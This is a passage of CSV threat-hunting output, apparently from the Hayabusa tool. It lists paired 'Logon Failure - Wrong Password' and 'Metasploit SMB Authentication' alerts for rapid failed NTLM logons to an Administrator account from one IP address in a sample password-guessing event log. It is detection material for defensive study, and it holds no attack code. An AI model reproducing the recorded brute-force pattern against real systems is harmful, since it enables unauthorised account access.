SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:08.841 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: daAeGcsqoqERsEu6 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:08.841 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:08.908 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 0iynnwxS8v4C5b3E : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:08.908 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:08.955 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 2kU7IS4XCvgRpTff : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:08.955 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:08.999 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong 
Password,User: Administrator : Type: 3 : Workstation: MBC8AJXBQHrCMrO2 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:08.999 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:09.049 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: NSGraDQmI4MAq9Ls : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:09.049 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:09.096 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: B7u2Pb9y8hB0iYWh : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:09.096 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:09.132 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: A657rbd6k4AD7M4i : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:09.132 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:09.180 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 7rkiDUBuTCU2jDXR : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:09.180 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:09.224 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: jjsCFTQoobrkQoWF : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:09.224 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:09.273 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 2dNXav95nZyBhVOc : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:09.273 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit 
SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:09.316 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Yeq1x56Ct6R2Nu3J : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:09.316 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:09.359 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: pUwyCNtwydEQu2bd : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:09.359 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:09.396 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: bX7eihAOk3PUgbwM : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:09.396 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:09.442 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong 
Password,User: Administrator : Type: 3 : Workstation: WPXqAsaYaXEr8I9L : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:09.442 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:09.480 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 4SaEmIpmlH1VMDun : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:09.480 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:09.534 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: a3Dvp43a2h7Mzx2H : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:09.534 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:09.575 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: g3voKlRXc7rIaIYs : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:09.575 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:09.629 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: GF1Q5OhCLRAi96mN : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:09.629 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:09.669 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: caHe4iY2CQoiumQI : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:09.669 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:09.734 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: SJi6UAm6Pp6eax8Q : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:09.734 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit 
SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:09.784 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 2EW0t2wapD8yniO4 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:09.784 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:09.872 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: PnaITXTihpB0stwx : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:09.872 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:09.913 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: tdBVoa82WKEAW2ce : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:09.913 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:09.953 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong 
Password,User: Administrator : Type: 3 : Workstation: BelKzJrEjGIcU2dN : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:09.953 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:10.008 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Ujeb7fRHPGCGmFm2 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:10.008 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:10.060 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Czwt7KF2sQHemwdJ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:10.060 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:10.117 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: LQQ4nNpbfKKVCJZH : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:10.117 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:10.157 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 6jwIc6e0AHAhXKK5 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:10.157 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:10.200 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Nld9Job0Ll1Fgtmy : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:10.200 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:10.242 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: q9sS6i9iU3PXhokz : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:10.242 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit 
SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:10.288 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: heaYv6Np8swhoVc9 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:10.288 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:10.334 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: I7rzgNBtUJkS93pO : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:10.334 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:10.381 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: gh45suNQ09FzPBjd : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:10.381 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:10.431 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong 
Password,User: Administrator : Type: 3 : Workstation: BOnwAGxxz994k6Ee : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:10.431 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:10.474 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: L26mvUKOgGptcKaZ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:10.474 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:10.517 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: aqldRjcLl8KFZr5h : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:10.517 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:10.569 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ycNPBtmRHShPOcRA : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:10.569 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:10.617 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ISlMGsVvXry0rbju : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:10.617 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:10.657 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: MjGjh70EQ5YVGJUt : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:10.657 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:10.700 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: yaYM5N2kuvuRCHRU : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:10.700 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit 
SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:10.738 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 32wgj2t7BLBviVxd : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:10.738 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:10.789 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: vr1kMRxLEaCIWIbf : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:10.789 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:10.832 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 4PHEJyKgp5wXRtBk : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:10.832 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:10.884 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong 
Password,User: Administrator : Type: 3 : Workstation: dbaoz8rTZVXUjRAg : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:10.884 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:10.928 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: d4eD3JQ5gquIqgND : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:10.928 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:10.969 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: U9slFFSSXhFxPqG1 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:10.969 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:11.009 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: YDb5Up4KwJj0hN5n : IP Address: 192.168.198.149 : AuthPackage: 
